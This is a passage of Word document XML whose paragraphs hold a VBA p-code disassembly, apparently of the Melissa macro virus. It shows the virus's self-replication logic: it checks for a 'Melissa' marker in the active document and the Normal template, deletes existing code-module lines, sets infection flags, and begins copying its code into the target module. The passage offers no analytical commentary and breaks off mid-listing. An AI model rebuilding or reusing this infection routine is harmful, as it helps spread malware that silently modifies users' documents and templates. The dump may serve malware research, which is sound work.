      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205C2672" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #40:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3BB7DD" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30094199" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd New </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2659C7" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0007 "Melissa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504F2745" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A26533" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">IfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1114EA" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #41:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365C4879" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LineCont 0x0004 05 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D55205A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADCL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C6E0BC" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A83D14" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Gt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163BE543" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D6E946" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">BoSImplicit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BFE32B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317AC010" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADCL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D26FEAD" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C051D05" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B37316B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall DeleteLines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6F9F3A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683C473D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #42:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B85E0D3" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SetStmt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0EED8D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BBE71A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set ToInfect </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389DC915" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #43:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1837EF31" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0007 "Melissa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DFE5FF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C872E26" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt New </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3902185C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #44:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206D4FE0" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9DFEAC" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St DoAD </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743FCC18" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>' Line #45:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E85BD16" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB3E54E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #46:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F70EC41" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A244A75" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd New </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D496A56" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0007 "Melissa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54811412" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EBE488" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">IfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AB281F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #47:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2F0AB3" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LineCont 0x0004 05 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BA3BE9" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTCL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51992D0A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C61B8D6" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Gt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFCF2A3" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F52BA9" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">BoSImplicit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7598C111" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00339EBE" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTCL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575D9259" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC44A6F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74684DFA" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall DeleteLines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60845EDD" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5138259E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #48:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7207F65D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SetStmt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36833111" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FE2693" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set ToInfect </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1AC797" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #49:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1467E52B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0007 "Melissa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CF5917" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D99C994" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt New </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD72747" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #50:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0AB9F1" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328C22CD" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St DoNT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451FDA8E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #51:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72104962" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DC1F99" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #52:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B5191C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld DoNT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769109A1" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352B6A1D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D92A17E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld DoAD </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4A3923" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037ECFCE" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F6CE61" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">And </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41583016" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F399574" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">BoSImplicit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F277EB3" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">GoTo CYA </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793460BB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696FDF9D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #53:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E289A4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld DoNT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C718DE" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0511D0A6" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Eq </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177E152C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">IfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFEFA8C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #54:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DEA43B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324F16F8" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F30F008" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33751569" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC320F5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Lines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D4193E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D928E1" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Eq </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160212E9" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">DoWhile </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689C3FF2" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #55:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4E15CF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A77972" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEADCAF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1321105A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
